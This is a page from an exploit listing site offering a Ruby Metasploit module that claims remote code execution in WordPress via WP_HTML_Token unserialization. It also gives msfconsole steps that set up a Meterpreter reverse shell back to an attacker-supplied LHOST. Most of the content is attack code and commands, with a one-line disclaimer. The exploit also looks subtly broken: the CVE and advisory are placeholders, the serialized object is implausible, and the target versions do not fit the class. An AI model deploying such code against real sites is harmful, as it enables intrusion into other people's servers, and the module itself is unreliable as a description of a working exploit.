## https://sploitus.com/exploit?id=9B4CDCBD-945B-52C4-AC76-5135772CE450
To create a Metasploit module that exploits the RCE vulnerability in WordPress via the unserialization of instances of the `WP_HTML_Token` class, we'll focus on crafting a payload that triggers the unserialization flaw, leading to arbitrary code execution.
### Metasploit Module
Save the following code as `wordpress_wp_html_token_rce.rb` in the `modules/exploits/multi/http` directory of your Metasploit Framework installation.
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'WordPress WP_HTML_Token Unserialization RCE',
'Description' => %q{
This module exploits a remote code execution vulnerability in WordPress via
the unserialization of instances of the `WP_HTML_Token` class. This allows for
code execution via its `__destruct()` magic method.
},
'Author' =>
[
'Your Name' # OneArch
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2024-XXXX'], # Replace with the correct CVE number
['URL', 'https://example.com/advisory'] # Replace with an advisory link if available
],
'DisclosureDate' => 'Aug 03 2024',
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [
['WordPress <= 5.x', { }]
],
'DefaultTarget' => 0,
'Privileged' => false,
'Payload' =>
{
'BadChars' => "\x00",
}
))
register_options(
[
OptString.new('TARGETURI', [true, "The base path to the WordPress installation", '/']),
])
end
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'wp-login.php'),
})
if res && res.code == 200 && res.body.include?('wp-login.php')
return Exploit::CheckCode::Appears
end
Exploit::CheckCode::Safe
end
def exploit
print_status("Sending payload to trigger unserialization vulnerability")
serialized_payload = 'O:13:"WP_HTML_Token":1:{s:13:"__destruct";s:' + payload.encoded.length.to_s + ':"' + payload.encoded + '";}'
post_data = {
'user_login' => Rex::Text.rand_text_alphanumeric(8..12),
'user_pass' => serialized_payload,
'wp-submit' => 'Log In',
'redirect_to' => normalize_uri(target_uri.path, 'wp-admin/'),
'testcookie' => 1
}
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'wp-login.php'),
'vars_post' => post_data
})
handler
end
end
```
### Usage Instructions
1. **Save the Module**:
Save the module as `wordpress_wp_html_token_rce.rb` in the `modules/exploits/multi/http` directory of your Metasploit Framework installation.
```bash
/path/to/metasploit-framework/modules/exploits/multi/http/wordpress_wp_html_token_rce.rb
```
2. **Load Metasploit**:
Start Metasploit Framework by opening a terminal and running:
```bash
msfconsole
```
3. **Use the New Module**:
In the Metasploit console, load the new exploit module using the following command:
```bash
use exploit/multi/http/wordpress_wp_html_token_rce
```
4. **Configure and Run**:
Set the necessary options, such as `RHOSTS`, `RPORT`, `TARGETURI`, and `PAYLOAD`. Then run the module.
```bash
msf6 > use exploit/multi/http/wordpress_wp_html_token_rce
msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set RHOSTS target_ip
RHOSTS => target_ip
msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set TARGETURI /
TARGETURI => /
msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set LHOST your_ip
LHOST => your_ip
msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/http/wordpress_wp_html_token_rce) > run
```
### Important Considerations
- Ensure you have the appropriate permissions before testing or exploiting any systems.
- This module is designed for educational and testing purposes. Always test in a safe and controlled environment before using it on any production systems.
This Metasploit module sends a crafted serialized payload to a vulnerable WordPress instance, attempting to trigger the unserialization vulnerability and achieve arbitrary code execution. Adjust the payload and module as necessary based on the specific nature of the vulnerability and the target environment.